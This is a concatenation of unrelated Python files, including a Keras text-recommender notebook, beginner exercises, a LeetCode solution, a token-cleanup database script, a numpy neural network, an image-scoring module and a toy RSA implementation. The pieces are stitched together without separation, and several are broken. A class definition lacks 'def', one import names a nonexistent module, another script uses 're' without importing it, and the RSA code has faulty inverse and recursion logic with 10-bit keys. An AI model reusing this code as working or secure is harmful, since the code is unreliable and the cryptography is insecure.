dat2['roles']=dat2['roles'].str.strip( "' ") dat2['roles']=dat2['roles'].str.replace( "', '" ,"," ) if not (dat2.id_text.empty): dat2.insert(2, "Event2", "Read", allow_duplicates=True) else : dat2['Event2'] == "NaN" indexNames=dat2[dat2["roles"].str.contains("activeClient|activeProspect") == False].index dat2 =dat2.drop(indexNames, axis=0) dat2=dat2.drop_duplicates() """**DATA 03 : COPIES**""" res3 = db.rc_copies.find() dat3 = pd.DataFrame(list(res3)) dat3.rename(columns= {'text': 'id_text'},inplace=True) dat3.rename(columns= {'user': 'id_user'},inplace=True) dat3=dat3.drop(['_id' ,'agent', 'host',"content",'createdAt','updatedAt', '__v'] , axis = 1) if not (dat3.id_text.empty): dat3.insert(2, "Event3", "Copy", allow_duplicates=True) else : dat3['Event3'] == "NaN" dat3=dat3.drop_duplicates() """**Jointure des 03 datas**""" df1= pd.merge(dat2, dat1, on=["id_user","id_text"] ,how='left') df2 =pd.merge(df1, dat3, on=["id_user","id_text"],how='outer') df2 = df2[['id_user','id_text','title','Event1','Event2','Event3']] df2=df2.drop_duplicates() """**ATTRIBUTION DES POIDS A CHAQUE EVENT**""" event_type_strength = { 'NaN' : 0.0 , 'Read': 1.0, 'Copy': 2.0, 'Bookmark': 3.0, 'Like' : 4.0 } df2['Event1'] = df2['Event1'].fillna("NaN") df2['Event2'] = df2['Event2'].fillna("NaN") df2['Event3'] = df2['Event3'].fillna("NaN") df2['Event1'] = df2['Event1'].apply(lambda x: event_type_strength[x]) df2['Event2'] = df2['Event2'].apply(lambda x: event_type_strength[x]) df2['Event3'] = df2['Event3'].apply(lambda x: event_type_strength[x]) df2.insert(6, "rating", 0.0, allow_duplicates=False) df2['rating'] = df2.sum(axis=1) col_list = ['id_user','id_text','title','rating'] df2 = df2[col_list] titre_null=df2[df2['title'].isnull()].index df2 =df2.drop(titre_null, axis=0) df2 =df2.drop_duplicates() """**Méthode 01 : Neural Networks**""" data0=df2 user_ids = data0["id_user"].unique().tolist() user2user_encoded = {x: i for i, x in enumerate(user_ids)} userencoded2user = {i: x for i, x in enumerate(user_ids)} text_ids = data0["id_text"].unique().tolist() text2text_encoded = {x: i for i, x in enumerate(text_ids)} text_encoded2text = {i: x for i, x in enumerate(text_ids)} data0["user"] = data0["id_user"].map(user2user_encoded) data0["text"] = data0["id_text"].map(text2text_encoded) num_users = len(user2user_encoded) num_texts = len(text_encoded2text) data0["rating"] = data0["rating"].values.astype(np.float32) # min and max ratings will be used to normalize the ratings later min_rating = min(data0["rating"]) max_rating = max(data0["rating"]) print( "Number of users: {}, Number of Texts: {}, Min rating: {}, Max rating: {}".format( num_users, num_texts, min_rating, max_rating ) ) data0 = data0.sample(frac=1, random_state=42) x = data0[["user", "text"]].values # Normalize the targets between 0 and 1. Makes it easy to train. y = data0["rating"].apply(lambda x: (x - min_rating) / (max_rating - min_rating)).values # Assuming training on 90% of the data and validating on 10%. train_indices = int(0.9 * data0.shape[0]) x_train, x_val, y_train, y_val = ( x[:train_indices], x[train_indices:], y[:train_indices], y[train_indices:], ) EMBEDDING_SIZE = 50 class RecommenderNet(keras.Model): def __init__(self, num_users, num_texts, embedding_size, **kwargs): super(RecommenderNet, self).__init__(**kwargs) self.num_users = num_users self.num_texts = num_texts self.embedding_size = embedding_size self.user_embedding = layers.Embedding( num_users, embedding_size, embeddings_initializer="he_normal", embeddings_regularizer=keras.regularizers.l2(1e-6), ) self.user_bias = layers.Embedding(num_users, 1) self.text_embedding = layers.Embedding( num_texts, embedding_size, embeddings_initializer="he_normal", embeddings_regularizer=keras.regularizers.l2(1e-6), ) self.text_bias = layers.Embedding(num_texts, 1) def call(self, inputs): user_vector = self.user_embedding(inputs[:, 0]) user_bias = self.user_bias(inputs[:, 0]) text_vector = self.text_embedding(inputs[:, 1]) text_bias = self.text_bias(inputs[:, 1]) dot_user_text = tf.tensordot(user_vector, text_vector, 2) # Add all the components (including bias) x = dot_user_text + user_bias + text_bias # The sigmoid activation forces the rating to between 0 and 1 return tf.nn.sigmoid(x) model1 = RecommenderNet(num_users, num_texts, EMBEDDING_SIZE) earlystopping = callbacks.EarlyStopping(monitor ="val_loss", mode ="min", patience = 5 ,restore_best_weights = False) opt = tf.keras.optimizers.Adam(learning_rate=0.01 ) model1.compile( optimizer=opt, loss='mean_squared_error', metrics=['accuracy'] ) history = model1.fit( x=x_train, y=y_train, batch_size=32, epochs=100, verbose=1, validation_split=0.2, validation_data=(x_val, y_val), callbacks =[earlystopping] ) model1.summary() #tf.keras.utils.plot_model(model1, to_file='model1.png') """ # Plot the loss function fig, ax = plt.subplots(1, 1, figsize=(10,6)) ax.plot(np.sqrt(history.history['loss']), 'r', label='train') ax.plot(np.sqrt(history.history['val_loss']), 'b' ,label='val') ax.set_xlabel(r'Epoch', fontsize=20) ax.set_ylabel(r'Loss', fontsize=20) ax.legend() ax.tick_params(labelsize=20) # Plot the mean_squared_error fig, ax = plt.subplots(1, 1, figsize=(10,6)) ax.plot(np.sqrt(history.history['mean_squared_error']), 'r', label='train') ax.plot(np.sqrt(history.history['val_mean_squared_error']), 'b' ,label='val') ax.set_xlabel(r'Epoch', fontsize=20) ax.set_ylabel(r'MeanSquaredError', fontsize=20) ax.legend() ax.tick_params(labelsize=20) # Plot the accuracy fig, ax = plt.subplots(1, 1, figsize=(10,6)) ax.plot(np.sqrt(history.history['accuracy']), 'r', label='train') ax.plot(np.sqrt(history.history['val_accuracy']), 'b' ,label='val') ax.set_xlabel(r'Epoch', fontsize=20) ax.set_ylabel(r'Accuracy', fontsize=20) ax.legend() ax.tick_params(labelsize=20) plt.plot(history.history["loss"]) plt.plot(history.history["val_loss"]) plt.title("model loss") plt.ylabel("loss") plt.xlabel("epoch") plt.legend(["train", "test"], loc="upper left") plt.show() """ # Let us get a user and see the top recommendations. def recommended_texts1(user_id) : user_id = ObjectId(user_id) #user_id = df2.id_user.sample(1).iloc[0] # Let us get a user and see the top recommendations. #user_id = df2.id_user.sample(1).iloc[0] texts_watched_by_user = data0[data0.id_user == user_id] texts_not_watched = data0[ ~data0["id_text"].isin(texts_watched_by_user.id_text.values) ]["id_text"] texts_not_watched = list( set(texts_not_watched).intersection(set(text2text_encoded.keys())) ) texts_not_watched = [[text2text_encoded.get(x)] for x in texts_not_watched] user_encoder = user2user_encoded.get(user_id) user_text_array = np.hstack( ([[user_encoder]] * len(texts_not_watched), texts_not_watched ) ) user_text_array1 = tf.convert_to_tensor(user_text_array, np.float32) ratings = model1.predict(user_text_array1).flatten() top_ratings_indices = ratings.argsort()[-10:][::-1] recommended_text_ids = [ text_encoded2text.get(texts_not_watched[x][0]) for x in top_ratings_indices ] top_texts_user = ( texts_watched_by_user.sort_values(by="rating", ascending=False) .head(5) .title #.id_text.values ) liste1= [] #movie_df_rows = data0[data0["title"].isin(top_texts_user)] for row in top_texts_user: liste1.append(row) return liste1 def recommended_texts2(user_id) : user_id = ObjectId(user_id) #user_id = df2.id_user.sample(1).iloc[0] # Let us get a user and see the top recommendations. #user_id = df2.id_user.sample(1).iloc[0] texts_watched_by_user = data0[data0.id_user == user_id] texts_not_watched = data0[ ~data0["id_text"].isin(texts_watched_by_user.id_text.values) ]["id_text"] texts_not_watched = list( set(texts_not_watched).intersection(set(text2text_encoded.keys())) ) texts_not_watched = [[text2text_encoded.get(x)] for x in texts_not_watched] user_encoder = user2user_encoded.get(user_id) user_text_array = np.hstack( ([[user_encoder]] * len(texts_not_watched), texts_not_watched ) ) user_text_array1 = tf.convert_to_tensor(user_text_array, np.float32) ratings = model1.predict(user_text_array1).flatten() top_ratings_indices = ratings.argsort()[-10:][::-1] recommended_text_ids = [ text_encoded2text.get(texts_not_watched[x][0]) for x in top_ratings_indices ] recommended_texts = data0[data0["id_text"].isin(recommended_text_ids)] recommended_texts=recommended_texts.drop_duplicates('title') liste2 = [] for row in recommended_texts.iterrows(): liste2.append(row[1].title) return liste2 print("*************FIN**************")
#!/usr/bin/python3.4 # -*-coding:Utf-8 liste = [1, 2, 3] liste2 = list(liste) liste2.append(4) print("liste = {}, liste2 = {}".format(liste, liste2)) print("id liste = {}, id liste2 = {}".format(id(liste), id(liste2))) liste2 = liste print("id liste = {}, id liste2 = {}".format(id(liste), id(liste2)))
import pandas as pd import matplotlib.pyplot as plt df = pd.read_csv('data.csv', index_col='year') # House Price per square foot df['pxHousePerSqFt'] = df.medPrice / df.medSqFt # Gallons of Oil per Barrel bVol = 42.0 # Need 7.48 gallons of oil to raise 1SqFt by 1Ft galPerCuFt = 7.48 # Cubic feet per barrel cuFtPerBar = bVol / galPerCuFt # Oil Price per cubic foot df['pxOilPerCuFt'] = df.wtisplc / cuFtPerBar # Oily House Index = House (sqFt) over Oil (cuFt) df['OHI'] = df.pxHousePerSqFt / df.pxOilPerCuFt # Forcing higher house price to match XKCD #df['OHI'] = (df.pxHousePerSqFt * 1.2) / df.pxOilPerCuFt # What about 80% LTV? with plt.xkcd(): axes = df.plot(y=['medPrice', 'medSqFt', 'pxHousePerSqFt', 'wtisplc'], subplots=True, layout=(2,2), figsize=(10,8)) axes[1,0].set_xlabel('') axes[1,1].set_xlabel('') plt.tight_layout() plt.savefig('graphs.png') plt.show() with plt.xkcd(): axes = df.plot(y=['OHI'], figsize=(10.1,5)) axes.set_xlabel('') plt.tight_layout() plt.savefig('ohi.png') plt.show()
class Solution: # https://leetcode.com/problems/longest-palindromic-substring/discuss/2954/Python-easy-to-understand-solution-with-comments-(from-middle-to-two-ends) def longestPalindrome(self, s): """ :type s: str :rtype: str """ res = "" for i in range(len(s)): temp = self.isPalindromicSubstring(s, i, i) if len(res) < len(temp): res = temp temp = self.isPalindromicSubstring(s, i, i+1) if len(res) < len(temp): res = temp return res def isPalindromicSubstring(self, s, i, j): m = len(s) while i >= 0 and j <= m-1 and s[i] == s[j]: i, j = i-1, j+1 return s[i+1:j]
# encoding=UTF-8 # Очищает истекшие токены, удаляя их ищ БД from dotenv import load_dotenv, find_dotenv from pathlib import Path import json import os import pymysql import traceback import time import sys path = os.path.dirname(os.path.abspath(__file__)) sys.path.append(path + "/../") from reviewgramdb import connect_to_db def clear_tokens(): path = os.path.dirname(os.path.abspath(__file__)) env_path = Path(path + "/../") / '.env' load_dotenv(dotenv_path=env_path) timestamp = int(time.time()) cleanupTime = int(os.getenv("TOKEN_CLEANUP_TIME")) * 60 con = connect_to_db() with con: cur = con.cursor() cur.execute("DELETE FROM `token_to_chat_id` WHERE `TOKEN` IN (SELECT `TOKEN` FROM `token_to_user_id` WHERE " + str(timestamp) + " - TSTAMP >= " + str(cleanupTime) + ")") con.commit() cur.close() cur = con.cursor() cur.execute("DELETE FROM `token_to_user_id` WHERE " + str(timestamp) + " - TSTAMP >= " + str(cleanupTime)) con.commit() cur.close() if __name__== "__main__": clear_tokens()
import jieba, os from jieba import posseg jieba.default_logger.setLevel(jieba.logging.INFO) class WordList(object): def __init__(self, show_progress=False): self.show_progress = show_progress def get(self, file): if self.show_progress: print('reading: %s' % file) try: with open(file, 'r') as f: txt = f.read() except UnicodeDecodeError: try: with open(file, 'r', encoding='gb2312') as f: txt = f.read() except UnicodeDecodeError: if self.show_progress: print('decode error, skipping: %s' % file) txt = '' return posseg.cut(txt) def get_from_list(self, file_list): word_list = [] for f in file_list: if os.path.exists(f): if os.path.isdir(f): l = map(lambda x: f + '/' + x, os.listdir(f)) w = self.get_from_list(l) if w: word_list += w else: return [] elif f.endswith('.txt'): word_list += self.get(f) else: if self.show_progress: print('file "%s" does not exist' % f) return [] return word_list if __name__ == '__main__': pass
# ############################### # Michael Vassernis - 319582888 # ################################# import numpy as np from helper_functions import softmax class NNModel(object): def __init__(self, dims): self.loss_data = [] self.dims = dims self.params = [] for i in range(0, len(dims) - 1): # using sqrt(6) parameters initialization (Optimal according to an old ML paper) r_w = np.sqrt(6) / np.sqrt(dims[i] + dims[i + 1]) r_b = np.sqrt(6) / np.sqrt(dims[i + 1] + 1) w = np.random.uniform(-r_w, r_w, (dims[i], dims[i + 1])) b = np.random.uniform(-r_b, r_b, dims[i + 1]) self.params.append(w) self.params.append(b) self.num_params = len(self.params) def add_loss_data(self, loss): self.loss_data.append(loss) def feed_forward(self, input_vec): curr_layer = input_vec for i in range(0, self.num_params - 2, 2): # new layer = old layer * W + b curr_layer = np.dot(curr_layer, self.params[i]) + self.params[i + 1] # non linearity curr_layer = np.tanh(curr_layer) curr_layer = np.dot(curr_layer, self.params[-2]) + self.params[-1] # curr_layer = softmax(curr_layer) return curr_layer def predict(self, input_vec): return np.argmax(self.feed_forward(input_vec)) def loss_and_gradients(self, input_vec, y_true, hidden_dropout, input_dropout): hidden_layers = [] dropouts = [] hidden_layers_tanh = [input_vec * np.random.binomial(1, 1.0 - input_dropout, size=input_vec.shape)] keep = 1.0 - hidden_dropout scale = 1.0 / keep for i in range(0, self.num_params - 2, 2): hidden_layers.append(np.dot(hidden_layers_tanh[i / 2], self.params[i]) + self.params[i + 1]) dropout = np.random.binomial(1, keep, size=hidden_layers[-1].shape) * scale dropouts.append(dropout) hidden_layers_tanh.append(np.tanh(hidden_layers[-1]) * dropout) y_hat = np.dot(hidden_layers_tanh[len(hidden_layers_tanh) - 1], self.params[-2]) + self.params[-1] y_hat = softmax(y_hat) loss = - np.log(y_hat[int(y_true)]) d_loss_d_out = y_hat d_loss_d_out[int(y_true)] -= 1 grads = [] for t in range(0, len(hidden_layers_tanh)): index = len(hidden_layers_tanh) - 1 - t g_b = d_loss_d_out g_w = np.outer(hidden_layers_tanh[index], d_loss_d_out) grads.insert(0, g_b) grads.insert(0, g_w) if index > 0: d_loss_d_hidden_act = np.dot(self.params[index * 2], d_loss_d_out) d_drop_out_loss = dropouts[index - 1] d_hidden_act_d_hidden = 1 - np.tanh(hidden_layers[index - 1]) ** 2 d_loss_d_out = d_loss_d_hidden_act * d_hidden_act_d_hidden * d_drop_out_loss return loss, grads def train_on_example(self, input_vec, y_true, learning_rate, regularization): loss, grads = self.loss_and_gradients(input_vec, y_true, 0.4, 0.1) for i in range(0, self.num_params): # update the parameters with gradients, and add L2 regularization self.params[i] -= learning_rate * (grads[i] + self.params[i] * regularization) return loss
a = float(input('Altura da parede: ')) l = float(input('Largura da parede: ')) m2 = a * l t = m2 / 2 print('Com a área da parede sendo de {}m², é necessário {:.1f}L para pintar'.format(m2, t))
import math n = [] li = [] li = [i for i in range(2,10000)] while li[0] <= int(math.sqrt(10000)): n.append(li[0]) sss = li[0] li = [i for i in li if i % sss != 0] n.extend(li) while True: ans = 0 x = int(input()) if x == 0: break for i in range(x): ans += n[i] print(ans)
for x in range(1,10): for y in range(1,10): ans = x * y print(str(x) +'x'+ str(y) +'='+ str(ans))
class PlotData: __init__(self, name, title, source, expression, selection, labels): self.name = name self.title = tile self.source = source self.expression = expression self.selection = selection self.labels = labels
#class NoneRelase(Exception): ''' автор: Вацлав реализация алоритма шифровния RSA ''' import random import math class rsa: _word = '' bitSize = 10 e = 29 n=0 d=0 def __init__(self,word): self.word = word def __init__(self): pass def _textToint(self,word): ''' метод преобразования текста в соотвествующий код ascii & unicode работа отлаживается только на acii >>> a = rsa();a._textToint('hello world') 104101108108111032119111114108100 ''' s = [ord(x) for x in word] s = ''.join(map(lambda x: [str(x),"0"+str(x)][x<100] ,s) )#если код <100 подставить 0 в начало s = int(s) return s def _intToText(self, intcode): ''' метод преобразования кода чисел в символы ''' intcode = str(intcode) ptr=0 buf = '' result = '' for x in range(len(intcode)): buf+=intcode[x] ptr+=1 if ptr==3: ptr=0 result+=chr(int(buf)) buf='' return result def encode(self, inword): self.intcode = self._textToint(inword) return self.binpow(self.intcode, self.e, self.n) #return "encode was note define" def decode(self, output): text = self.binpow(output, self.d, self.n) print('decode: ',text) text = self._intToText(text) return text def binpow(self,a, x, mod): #return math.pow(a,x) % mod res = 1 a %= mod while (x): if (int(x) & 1): res *= a res %= mod a *= a a %= mod x /= 2 return res def rabin_miller(self, m=bitSize, r=10): if (m == 2): return True if ((m < 2) or (m % 2 == 0)): return False p = 0 q = m-1 #ищем степень в которую можно возвести while (q % 2 == 0): q /= 2 p += 1 #цикл A while (r): x = random.randint(2, m-1) # случайное число из диапазона x = self.binpow(x,q,m) #то самое стремление к х if (x == 1 or x == m-1): return True #цикл Б for i in range(0,p): x = (x * x) % m if (x == m-1): break else: return False p -= 1 r -= 1 return True def _primeGenerator(self,bitSize): '''генерирует простое случайное число заданной длины ''' start = 2**(bitSize-1) end = 2**bitSize - 1 ptr = 0 while (1): prime = random.randint(start, end) ptr+=1 #print(ptr) if self.rabin_miller(prime): return prime def gcdExt(self,a,b): ''' алгоритм нахождения расширенного алгоритма Евклида возвращает картеж из: d - НОД, x, y из ax + by = НОД(a, b) ''' x=y=d=0 if b==0: x=1 y=0 return a,x,y d,x,y = gcdExt(b,a%b) x,y = y, x - (a/b) * y return d,x,y def keyGenerator(self): while 1: p = self._primeGenerator(self.bitSize) #генерируем p .1 q = self._primeGenerator(self.bitSize) #генрируем q .1 self.n = p * q #-||- q .2 phi_n = (p-1) * (q-1) #.3 if p!=q and phi_n > self.e and phi_n % self.e != 0: #.4 break self.d = math.pow(self.e,-1) % ((p-1)*(q-1)) #e,n - open key, d - private key print(self.n,self.d) ''' 1)декод возврщаетет 1 ''' def main(): myrsa = rsa() print(myrsa._textToint("hello world")) print(myrsa.rabin_miller(21, 3)) myrsa.keyGenerator() print('hello: ',myrsa.encode("he")) print("dehello:",myrsa.decode(myrsa.encode("he"))) if __name__ == "__main__": main() import doctest doctest.testmod()
import sys, os def convertToBinaryData(filename): with open(filename, 'rb') as file: binaryData = file.read() return binaryData direcotry_name = os.path.dirname(sys.argv[0]) l = [] ## initialize few lists which we will later use oid = 0 #. img_id = [] #. cat_img_name =[] #. img_type = [] #. img_res = [] #. img_name = [] #. img_size = [] #. blob_data = [] #. x = [] #. y = [] #. z = [] ## img_res_val = "960x540" img_type_val = "png" for subdir, dirs, files in os.walk(direcotry_name): for file in files: filepath = subdir + os.sep + file cat_img = filepath.replace(subdir, "") cat_img_name.append(cat_img) img_res.append(img_res_val) img_type.append(img_type_val) img_name.append(cat_img.replace(".png","")) img_size.append(os.path.getsize(filepath)) blob_data.append(convertToBinaryData(filepath)) e = re.findall("X\d+.", filepath) # find the x degree using regex qewg=e[0].replace("X","").replace("_", "") x.append(qewg) e = re.findall("Y\d+.", filepath) # find the y degree using regex qewg=e[0].replace("Y","").replace("_", "") y.append(qewg) e = re.findall("Z\d+.", filepath) # find the z degree using regex qewg=e[0].replace("Z","").replace("_", "") z.append(qewg) oid = oid + 1 #print(oid) img_id.append(oid) data = { "image_id" : img_id, "image_name": img_name, "image_size": img_size, "image_reso": img_res, # create a data dictonary with all the lists "image_type": img_type, "image_BLOB": blob_data, "X" : x, "Y" : y, "Z" : z, } import pandas as pd dataFrame = pd.DataFrame(data) # convert data dictonary into a dataframe dataFrame.to_csv('final.csv',encoding='utf-8') # export the dataFrame into a csv
""" Contains code for score calculation and other tasks to be excuted on images """ from cv2 import imread, line, bitwise_and import numpy as np def find_mean_color(img, on_pixels = -1): """ Returns mean color of an image (in B, G, R). If on_pixels are provided (non negative), then the total color is divided by this value instead of total pixels in image. This is used for calculating color of a path. """ if on_pixels == -1: pixels = img.shape[0] * img.shape[1] else: pixels = on_pixels mean_blue = int(np.sum(img[:, :, 0]) / pixels) mean_green = int(np.sum(img[:, :, 1]) / pixels) mean_red = int(np.sum(img[:, :, 2])/ pixels) return (mean_blue, mean_green, mean_red) def make_mask(points_array, shape = (400, 600, 3)): """ Returns the mask made by using the points provided from the player. The mask consists of lines drawn by the player and is used for calculating the score. Also returns the number of "on" pixels (pixels with white color) """ number_of_points = len(points_array) mask = np.zeros(shape) for i in range(number_of_points - 1): line(mask, points_array[i], points_array[i+1], (255, 255, 255), 20) total_white_color = np.sum(mask[:, :, 0]) total_on_pixels = int(total_white_color / 255.0) return mask, total_on_pixels def find_score(level_id, points): """ Calculates the score by taking the level_id and points. """ fileref = "app/controls/levels/" + str(level_id) + ".jpg" level_img = imread(fileref) mask, on_pixels = make_mask(points, shape = level_img.shape) mask = np.array(mask, dtype = np.uint8) result = bitwise_and(level_img, mask) level_mean = find_mean_color(level_img) solution_mean = find_mean_color(result, on_pixels = on_pixels) score = 0.0 for x in range(3): score += (level_mean[x] - solution_mean[x]) ** 2 score = int(np.sqrt(score)) print "score is : " + str(score) return score
pw = 'a123456' i = 3 while i > 0: i = i - 1 password = input('請輸入密碼:') if password == pw: print('登入成功') break else: print('密碼錯誤!') if i > 0: print('還有', i , '次機會') else: print('您已錯誤三次,請重設密碼!')
import numpy as np from scipy.spatial import Delaunay from .utils import fix from .affine import affine_matrix class MultiAffine: def __init__(self, origin_points, new_points, triangulation=None): for p in [(0.0, 0.0), (0.0, 1.0), (1.0, 0.0), (1.0, 1.0)]: assert(p in origin_points) assert(p in new_points) if triangulation is None: triangulation = Delaunay(new_points) self.origin_points = np.array(origin_points) self.new_points = np.array(new_points) self.triangulation = triangulation self.affines = [] for triangle in triangulation.simplices: mat1 = affine_matrix(*self.origin_points[triangle]) mat2 = affine_matrix(*self.new_points[triangle]) affine = np.matmul(np.linalg.inv(mat2), mat1) self.affines.append(affine) def __call__(self, x, y, origin_width, origin_height, new_width, new_height): nx = x / new_width ny = y / new_height index = self.triangulation.find_simplex((nx, ny)) assert(index != -1) nx, ny, z = np.matmul(np.array([nx, ny, 1]), self.affines[index]) # print(x, y, nx / z * origin_width, ny / z * origin_height) return fix(nx / z * origin_width, ny / z * origin_height, origin_width, origin_height)
# Mana bizdan odamni ogírligi boýiga qarab bilish kerak bulsin bunda boýning hajmi 0.45 ga ko'paytiriladi weight_lbs=input("Weight lbs= ") weight_kg=int(weight_lbs)*0.45 print(weight_kg)
import xml.tree.ELementTree as ET
""" Fix the path issues in the log files. This is for the preparation of running batch training """ import pandas as pd import os def update_df(log_file_dir): """ Update the file directory of each image file in driving_log.csv. This function returns a new dataframe that has the same form as driving_log.csv. The file name of each image file becomes: log_file_dir/IMG/XXXXXX.JPG :param log_file_dir: the new file directory. :return: the new dataframe """ def change_dir(x): file_dir, fname = os.path.split(x) return os.path.join(log_file_dir, 'IMG/', fname) df = pd.DataFrame.from_csv(os.path.join(log_file_dir, 'driving_log.csv'), header=0, index_col=None) ndf = df[['center', 'left', 'right']] ndf = ndf.applymap(change_dir) df[['center', 'left', 'right']] = ndf return df if __name__ == "__main__": file_dir = './data/official_baseline/' df = update_df(file_dir) df.to_csv('new_log_file.csv', index=None)